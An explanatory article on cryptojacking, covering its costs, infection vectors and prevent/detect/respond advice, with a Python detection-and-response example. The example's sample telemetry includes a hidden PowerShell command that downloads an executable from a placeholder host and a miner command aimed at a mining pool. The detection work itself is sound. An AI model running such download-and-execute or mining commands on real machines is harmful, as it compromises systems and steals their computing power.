Illegal cryptocurrency mining

Adopting the right approach to these types of threats

Cryptocurrency mining has grown considerably in recent years. According to reports by cybersecurity and digital forensics specialists from the International Institute of Cyber Security, one out of every 500 sites (from a list of the million most visited websites) contains scripts that mine cryptocurrency without the user's consent, in what is known as cryptojacking.

Cryptojacking can have disastrous consequences for its victims, such as the degradation and eventual failure of infected computers and smartphones: the mining code drives the CPU beyond its capacity and causes excessive electricity consumption. A device hit by cryptojacking sees its productivity reduced (including in its critical operations) as system performance degrades considerably. The attack could also compromise the security of confidential data stored on the affected systems.

Some digital forensics specialists believe that the most frightening thing about cryptojacking is that it can go unnoticed for long periods of time. Any endpoint is at risk, so it is worth asking: how can we protect our endpoints from the effects of cryptojacking?

Why do cybercriminals find cryptojacking attacks so tempting? Unlike ransomware, cryptocurrency mining is stealthier and can be really difficult to detect, and it also eliminates the hassle of demanding a ransom from victims. Mining can represent a constant source of income for attackers, especially when thousands of systems are attacked at once.

An average device can generate about 0.25 dollars a day. It may not seem like much, but that figure changes when systems are attacked on a massive scale. The gains increase with the hash rate (the speed at which a particular mining machine operates) and with the amount of electric energy consumed. In a cryptojacking campaign analyzed by a digital forensics firm, attackers generated about $704 USD a day ($257k USD in a year) using vulnerable endpoints. Five other related campaigns were discovered at the same time, accumulating a total of over $1M USD. Given the low awareness of these kinds of problems, it is very likely that such massive attack campaigns will continue in the future.

Attack vectors

Email: In one past campaign an attacker sent emails posing as a job application. The email contained a Word document that appeared to be a CV and led victims to enable macro content, which initiated the download of Monero mining software.

Exploits: Attackers have been seen exploiting vulnerabilities in software such as Adobe Flash, while others use malware delivery channels such as Smokeloader. The most significant thing about this kind of exploit is its ability to run for months (even years) on infected systems. In addition, known exploits such as EternalBlue, used to exploit SMB vulnerabilities in the well-known WannaCry campaign, are now being used to deploy cryptojacking software.

Other variants: Attackers also resort to other infection paths, such as injecting code through compromised browser plugins, trusted system processes, and websites that embed mining JavaScript. This allows mining to take place while the victim uses the browser.

How to avoid becoming a victim of cryptojacking

Digital forensics specialists offer some tips for addressing this problem in the best possible way.

Prevent: Blocking difficult-to-detect mining threats before they reach our endpoints is essential. This is possible by taking advantage of several preventive engines that go beyond traditional antivirus, and by applying advanced capabilities such as exploit prevention and advanced sandboxing.

Detect: We know that the danger cannot be completely avoided, so it is important to have visibility into what happens after a file has successfully entered the environment. This is possible by continuously monitoring and analyzing command-line, file and process activity at each endpoint.

Respond: When cryptojacking is detected, a quick response is needed to contain the threat. Automated responses block malicious connections emanating from all endpoints, minimizing the risk of collateral damage.
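The detect and respond steps above, as an added worked example written for this article (it is not code from the original page or from any vendor product). It runs three detection rules over endpoint telemetry that tie back to the attack vectors described earlier (an Office application spawning a script host, as in the macro-laden CV; a command line pointing at a mining pool; a non-allowlisted process pinning the CPU) and then derives a containment plan of processes to terminate and destinations to block. The telemetry format, its field names, the sample log lines, the indicator lists and the 90% CPU threshold are all assumptions constructed for this example; the `stratum+tcp://` and `stratum+ssl://` URL schemes are the ones mining software uses to reach pools.

```python
"""Detection-and-response pass over constructed endpoint telemetry.

Illustrative example written for the article, not a product implementation.
Event format, field names, sample lines, indicator lists and thresholds are
assumptions made for this example.
"""
import json
import re

# Constructed sample telemetry: one JSON object per line, as an endpoint agent
# might emit. Hosts, pids, file names and addresses are invented for the example.
SAMPLE_TELEMETRY = """\
{"ts": 1, "host": "pc-01", "event": "process", "pid": 400, "ppid": 120, "image": "winword.exe", "parent_image": "explorer.exe", "cmdline": "winword.exe CV_applicant.doc", "cpu_pct": 3}
{"ts": 2, "host": "pc-01", "event": "process", "pid": 410, "ppid": 400, "image": "powershell.exe", "parent_image": "winword.exe", "cmdline": "powershell.exe -w hidden -c iwr http://example.invalid/u.exe -OutFile u.exe", "cpu_pct": 5}
{"ts": 3, "host": "pc-01", "event": "process", "pid": 420, "ppid": 410, "image": "u.exe", "parent_image": "powershell.exe", "cmdline": "u.exe -o stratum+tcp://pool.example.invalid:3333 -u wallet", "cpu_pct": 97}
{"ts": 4, "host": "pc-01", "event": "netconn", "pid": 420, "image": "u.exe", "dst": "203.0.113.7:3333"}
{"ts": 5, "host": "pc-02", "event": "process", "pid": 510, "ppid": 100, "image": "chrome.exe", "parent_image": "explorer.exe", "cmdline": "chrome.exe --type=renderer", "cpu_pct": 35}
{"ts": 6, "host": "pc-02", "event": "netconn", "pid": 510, "image": "chrome.exe", "dst": "198.51.100.9:443"}
"""

# Indicator lists (assumptions for the example).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# stratum+tcp / stratum+ssl are the URL schemes miners use to reach a pool.
POOL_URL = re.compile(r"stratum\+(?:tcp|ssl)://", re.IGNORECASE)
CPU_THRESHOLD = 90          # percent; assumed threshold for this example
CPU_ALLOWLIST = {"chrome.exe"}  # processes expected to be CPU-heavy (assumption)


def parse_telemetry(text):
    """Parse one JSON object per non-empty line into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def lineage(events, host, pid):
    """Follow ppid links on one host and return image names from the process
    itself up to the highest ancestor visible in the telemetry."""
    table = {e["pid"]: e for e in events
             if e["event"] == "process" and e["host"] == host}
    chain, seen = [], set()
    while pid in table and pid not in seen:
        seen.add(pid)
        chain.append(table[pid]["image"])
        pid = table[pid]["ppid"]
    return chain


def detect(events):
    """Apply the three rules to every process event; return a list of findings."""
    findings = []
    for e in events:
        if e["event"] != "process":
            continue
        host, pid, image = e["host"], e["pid"], e["image"]
        cmd = e.get("cmdline", "")
        # Rule 1: an Office application launching a script host (macro behaviour).
        if e.get("parent_image") in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append({"host": host, "pid": pid, "rule": "office_macro_spawn",
                             "severity": "medium",
                             "detail": f"{e['parent_image']} -> {image}"})
        # Rule 2: a command line that points at a mining pool; record lineage.
        if POOL_URL.search(cmd):
            findings.append({"host": host, "pid": pid, "rule": "mining_pool_cmdline",
                             "severity": "high",
                             "detail": " <- ".join(lineage(events, host, pid))})
        # Rule 3: a non-allowlisted process consuming almost all of the CPU.
        if e.get("cpu_pct", 0) >= CPU_THRESHOLD and image not in CPU_ALLOWLIST:
            findings.append({"host": host, "pid": pid, "rule": "high_cpu",
                             "severity": "medium",
                             "detail": f"{image} at {e['cpu_pct']}% CPU"})
    return findings


def plan_response(events, findings):
    """Containment plan: terminate high-severity processes and block every
    destination those processes were observed connecting to."""
    targets = {(f["host"], f["pid"]) for f in findings if f["severity"] == "high"}
    blocks = sorted({e["dst"] for e in events
                     if e["event"] == "netconn" and (e["host"], e["pid"]) in targets})
    return {"terminate": sorted(targets), "block_destinations": blocks}


def analyze(text):
    """Parse, detect and plan in one call; returns (findings, response)."""
    events = parse_telemetry(text)
    findings = detect(events)
    return findings, plan_response(events, findings)


if __name__ == "__main__":
    findings, response = analyze(SAMPLE_TELEMETRY)
    for f in findings:
        print(f"[{f['severity']}] {f['host']} pid={f['pid']} {f['rule']}: {f['detail']}")
    print("response:", response)
```

On the sample data the miner process on pc-01 is flagged by both the pool-URL and CPU rules, its lineage shows it descends from the Word document, and the response plan terminates that one process and blocks only the pool address it contacted, leaving the busy but legitimate browser on pc-02 untouched. In a real deployment the command-line and CPU rules would be tuned per environment, and the CPU rule would look at sustained load over several samples rather than a single reading.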